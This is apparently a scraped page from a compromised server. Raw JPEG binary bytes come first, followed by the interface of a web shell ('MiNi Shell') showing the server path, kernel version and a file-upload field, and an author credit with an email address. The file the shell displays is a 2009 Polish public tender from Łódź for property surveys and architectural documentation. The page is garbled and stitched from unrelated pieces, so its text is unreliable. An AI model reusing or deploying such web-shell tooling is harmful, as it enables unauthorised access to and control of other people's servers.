JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090707/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090707/227010-N-2009.html

<p class="kh_header"><b>Łódź: Wykonanie prac projektowych związanych ze sporządzeniem analizy prawno-technicznej z analizą własności i dotychczasowego wyodrębnienia lokali oraz wykonanie dokumentacji zastępczej (odtworzenie) architektoniczno-budowlanej wraz z wykonaniem  inwentaryzacji instalacji w który dany budynek jest wyposażony w budynkach Wspólnot Mieszkaniowych.
Przedmiot zamówienia podzielono na cztery zadania</b><br>
<b>Numer ogłoszenia: 227010 - 2009; data zamieszczenia: 07.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Nieruchomościami Łódź-Śródmieście "Centrum II" , ul. Dowborczyków 5, 90-019 Łódź, woj. łódzkie, tel. 042 2536419, faks 042 2536422.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.centrum2.com3.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie prac projektowych związanych ze sporządzeniem analizy prawno-technicznej z analizą własności i dotychczasowego wyodrębnienia lokali oraz wykonanie dokumentacji zastępczej (odtworzenie) architektoniczno-budowlanej wraz z wykonaniem  inwentaryzacji instalacji w który dany budynek jest wyposażony w budynkach Wspólnot Mieszkaniowych.
Przedmiot zamówienia podzielono na cztery zadania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie prac projektowych związanych ze sporządzeniem analizy prawno-technicznej z analizą własności i dotychczasowego wyodrębnienia lokali oraz wykonanie dokumentacji zastępczej (odtworzenie) architektoniczno-budowlanej wraz z wykonaniem inwentaryzacji instalacji w który dany budynek jest wyposażony, w budynkach Wspólnot Mieszkaniowych będących w zarządzie  tutejszej Administracji oraz zarządzie obcym.
CPV:  71.00.00.00-8 usługi architektoniczne, budowlane, inżynieryjne i kontrolne,
	71.25.10.00-2 usługi architektoniczne i dotyczące pomiarów budynków
	71.25.00.00-5 usługi architektoniczne, inżynieryjne i pomiarowe
	71.20.00.00-0 usługi architektoniczne i podobne
Przedmiot zamówienia podzielono na cztery zadania:

Zadanie nr 1 obejmuje położone w Łodzi  nieruchomości:
Al. Kościuszki 56: budynki mieszkalne: frontowy i poprzecznej oficyny, o łącznej kubaturze 16050m3 ( instalacje: gaz, elektryczna, zimna woda, ciepła woda, centralne ogrzewanie, kanalizacja)
ul. Nawrot 42: budynki mieszkalne: frontowy i lewej oficyny oraz budynki gospodarcze poprzecznej oficyny i garaż w prawej oficynie, o łącznej kubaturze 6549m3( instalacje: gaz, elektryczna, zimna woda,  kanalizacja)
ul. Kilińskiego 118: budynek mieszkalny lewej oficyny, budynki gospodarcze prawej i poprzecznej oficyny,  o  łącznej kubaturze 5710m3( instalacje: gaz, elektryczna, zimna woda,  kanalizacja)
ul. Kilińskiego 119: budynki mieszkalne usytuowane w prawej oficynie ( wysoki i niski mieszkalny), o łącznej  kubaturze 6785m3( instalacje: gaz, elektryczna, zimna woda, ciepła woda, centralne ogrzewanie, kanalizacja)

Zadanie nr 2 obejmuje położone w Łodzi nieruchomości:
ul. Sienkiewicza 73: budynek mieszkalny frontowy i budynek gospodarczy prawej oficyny, o ogólnej kubaturze 6686m3( instalacje: gaz, elektryczna, zimna woda,  centralne ogrzewanie, kanalizacja)
ul. Wólczańskiej 62: budynek frontowy i lewej oficyny,  o łącznej kubaturze 8830m3 (instalacje: gaz, elektryczna, zimna woda,  centralne ogrzewanie, kanalizacja)
ul. Piotrkowskiej 119: budynek mieszkalny frontowy i garaże prawej oficyny, o łącznej kubaturze 12100m3 ( instalacje: gaz, elektryczna, zimna woda, ciepła woda, centralne ogrzewanie, kanalizacja)
ul. Piotrkowskiej 126: budynki mieszkalne: frontowy, lewej i poprzecznej oficyny oraz budynek użytkowy poprzecznej oficyny,  o łącznej  kubaturze 6475m3( instalacje: gaz, elektryczna, zimna woda,  kanalizacja)

Zadanie nr 3 obejmuje nieruchomości położone w Łodzi przy:
ul. Piotrkowskiej 137/139: budynek frontowy użytkowy, budynek mieszkalny lewej oficyny, garaże i pracownia plastyczna lewej oficyny,  o łącznej kubaturze 19242m3 ( wpisany do rejestru zabytków) ( instalacje: gaz, elektryczna, zimna woda,  centralne ogrzewanie, kanalizacja)
ul. Roosevelta 16: budynki mieszkalne: frontowy i prawej oficyny oraz budynki gospodarcze poprzecznej oficyny, o łącznej kubaturze 9449m3 ( instalacje: gaz, elektryczna, zimna woda,  kanalizacja)
Al. Kościuszki 46: budynki mieszkalne: frontowy i poprzecznej oficyny oraz garaże w lewej oficynie, o łącznej  kubaturze 17050m3  ( instalacje: gaz, elektryczna, zimna woda, ciepła woda, centralne ogrzewanie, kanalizacja)

Zadanie nr 4 obejmuje nieruchomości położone w Łodzi przy:
Al. Kościuszki 53: budynki mieszkalne: frontowy, prawej i lewej oficyny oraz budynek gospodarczy prawej oficyny, o łącznej  kubaturze 19090m3 ( instalacje: gaz, elektryczna, zimna woda,  centralne ogrzewanie, kanalizacja)
Placu Komuny Paryskiej 1: budynek mieszkalny frontowy i garaże w lewej oficynie, o łącznej  kubaturze 19190m3 ( instalacje: gaz, elektryczna, zimna woda,  centralne ogrzewanie, kanalizacja)
ul. Nawrot 25:budynek mieszkalny frontowy oraz budynki gospodarcze lewej i prawej oficyny, o łącznej  kubaturze 4988m3( instalacje: gaz, elektryczna, zimna woda,  kanalizacja)

Zakres zamówienia  obejmuje:
1.1 analiza stanu prawnego nieruchomości na podstawie takich dokumentów jak wypis z rejestru gruntu, wypis z księgi wieczystej
1.2. sprawdzenie zgodności aktów notarialnych z faktycznym stanem prawnym oraz wykonanymi pomiarami lokali a także w postaci wniosków wskazanie do wykonania  niezbędnych czynności w celu skorygowania błędów w aktach notarialnych lokali wyodrębnionych 
1.3. opis budynku (budynków) uwzględniający stan prawny, położenie na działce, wymiary, elementy konstrukcyjne (ściany, stropy, przewody kominowe itp) i wykończeniowe oraz  instalacje ( np. elektryczne, gazowe, wod-kan, co,cwu) w które wyposażony jest dany budynek 
1.4.dokonanie oględzin budynków
1.5.dokonanie pomiarów z natury
1.6.wykonanie rysunków w skali 1:100
1.7.wykonanie rzutów poszczególnych kondygnacji z podaniem nr. lokalu , nazwy pomieszczenia, powierzchni użytkowej (tabelarycznie i na rysunkach)
1.8.wykonanie rzutów dachu
1.9.wykonanie przekroi, elewacje
1.10.oświadczenie najemców o przeprowadzonych pomiarach i ich potwierdzenie
1.11.wydzielenie wszystkich samodzielnych lokali z uzasadnieniem wraz z podaniem czynności niezbędnych do dostosowani lokali niesamodzielnych do samodzielności w celu uzyskania dla nich zaświadczeń tę samodzielność potwierdzających - wszystkie samodzielne lokale należy oznaczyć w kolorze
1.12.wykonanie tabelarycznego zestawienia powierzchni użytkowej z zaznaczeniem powierzchni mieszkalnej, pomieszczeń przynależnych, policzenie udziałów w nieruchomości wspólnej wg. zasady dotychczas stosownej zał. Tabelaryczne - 4 i 5 do siwz
1.13.zaznaczenie zaniżonych wysokości (0-140, 140-220, 220-powyżej)
1.14.wykonanie pomiarów wg. PN 70/B 02365
1.15 Każdą z dokumentacji należy wykonać w wersji papierowej w czterech egzemplarzach w oparciu o: ustawę z dnia 7 lipca 1994r Prawo Budowlane (Dz. U. z 2006r Nr 156 poz.1118  z póź. Zm.), Rozporządzenie Ministra Infrastruktury z dnia 2 września 2004r w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz programu funkcjonalno- użytkowego (Dz. U. Nr 202, poz.20072, z póź. zm), Rozporządzenie Ministra Infrastruktury z dnia 12 kwietnia 2002r w sprawie warunków technicznych jakim powinny odpowiadać budynki i ich usytuowanie (Dz.U. Nr 75, poz.690 z póź. zm), Rozporządzenie Ministra Infrastruktury z dnia 3 lipca 2003r w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. Nr 120 poz.1133), ustawę z dnia 24 czerwca 1994r o własności lokali (Dz. U. z 2000r, nr 80, poz 903 z póź. zm.),  ustawę z dnia 21 czerwca 2001r. o ochronie praw lokatorów, mieszkaniowym zasobie gminy i o zmianie Kodeksu cywilnego ( Dz. U. z 2001 Nr 71 poz.733 z póź.zm.) 
1.16. Wykonawca ma prawo złożyć tylko jedną ofertę 
1.17.Zamawiający informuje, iż nie przewiduje możliwości udzielenia zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt.6 ustawy Pzp.
1.18.Zamawiający nie dopuszcza składania ofert  wariantowych. 
1.19.Zamawiający informuje, że Wykonawca może złożyć ofertę  tylko na jedno dowolnie wybrane zadanie..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.10.00-2, 71.25.00.00-5, 71.20.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 3.1 O zamówienie mogą ubiegać się Wykonawcy, którzy:
3.1.1 posiadają uprawnienia do wykonywania określonej działalności lub czynności,   
3.1.2 dysponują osobami niezbędnymi  do wykonania zamówienia,
3.1.3  posiadają niezbędną wiedzę i doświadczenie 
3.1.4 znajdują się w sytuacji ekonomicznej i finansowej zapewniającej  wykonanie     zamówienia,  
3.1.5 nie podlegają wykluczeniu z postępowania o udzielenie zamówienia (art. 24 ust. 1 i 2        ustawy Pzp.)       
Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt. 4 SIWZ.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 4.1 W celu potwierdzenia spełnienia warunków udziału w postępowaniu oferta musi zawierać następujące dokumenty lub oświadczenia:
4.1.1 aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do     ewidencji działalności gospodarczej - oryginał lub kserokopia potwierdzona za zgodność z 
oryginałem przez uprawnionego Wykonawcę, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
4.1.2 aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, oryginał lub kserokopia poświadczona   za zgodność z  oryginałem przez uprawnionego Wykonawcę
 4.1.3 oświadczenie  że, - wykonawca spełnia warunki udziału w postępowaniu, określone w  art. 22 ust. 1pkt 1-3 ustawy Pzp  , zał nr 3  do siwz
4.1.4 oświadczenie  że- wykonawca nie podlega wykluczeniu z postępowania o udzielenia zamówienia publicznego zgodnie z art. 24 ust 1 i 2 ustawy P.z.p, zał nr 3a   do siwz
4.1.5 polisę lub inny dokument ubezpieczenia potwierdzającego że wykonawca jest    ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności    gospodarczej na minimalną łączną kwotę 50000 zł ( pięćdziesiąt tysięcy złotych) -kserokopia poświadczona  za  zgodność z  oryginałem przez uprawnionego oferenta.
W przypadku, gdy okres ważności polisy jest krótszy od   terminu związania ofertą lub/oraz terminu wykonania zamówienia, należy dołączyć oświadczenie w formie oryginału, iż w przypadku udzielenia Wykonawcy zamówienia, zostanie  zawrte stosowne ubezpieczenie na kwotę nie mniejszą niż 50000zł( pięćdziesiąt tysięcy złotych)
4.1.6 wykaz  minimum dwóch kontraktów wykonania usługi porównywalnej swoim rodzajem z usługami stanowiącymi przedmiot zamówienia  w okresie ostatnich trzech lat, tj. do terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, z podaniem ilości,  przedmiotu, dat wykonania i odbiorców zał. nr 6.do siwz - oryginał  , oraz załączenie dokumentów potwierdzających, że usługi  zostały wykonane należycie i obejmowały swoim zakresem  przedmiot zamówienia. Referencje muszą być podpisane przez osobę uprawnioną do reprezentowania podmiotu. 
4.1.7 wykaz  osób i podmiotów, które  będą uczestniczyć w realizacji zamówienia wraz z zakresem wykonywanych przez nich czynności i kwalifikacji zał. nr 7 do siwz - w formie oryginału oraz kserokopiami posiadanych aktualnych uprawnień poświadczonych  za zgodność z  oryginałem przez uprawnionego wykonawcę w tym:
 - uprawnienia budowlane w specjalności architektonicznej lub konstrukcyjno-budowlanej- zgodnie z §16 lub §17 Rozporządzenia Ministra Transportu i Budownictwa z dnia 28.04.2006r w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2006r, Nr 83 poz.578  )  wraz z aktualnym wpisem na  Listę Okręgowej Izby  Inżynierów i Techników  Budownictwa ( jedna osoba odpowiedzialna za realizację zamówienia, może być właściciel )..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.centrum2.com3.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Administracja Nieruchomościami Łódź - Śródmieście Centrum II, 90-019 Łódź, ul. Dowborczyków 5 pok 15.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.07.2009 godzina 09:00, miejsce: Administracja Nieruchomościami Łódź - Śródmieście Centrum II, 90-019 Łódź, ul. Dowborczyków 5 pok 19 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com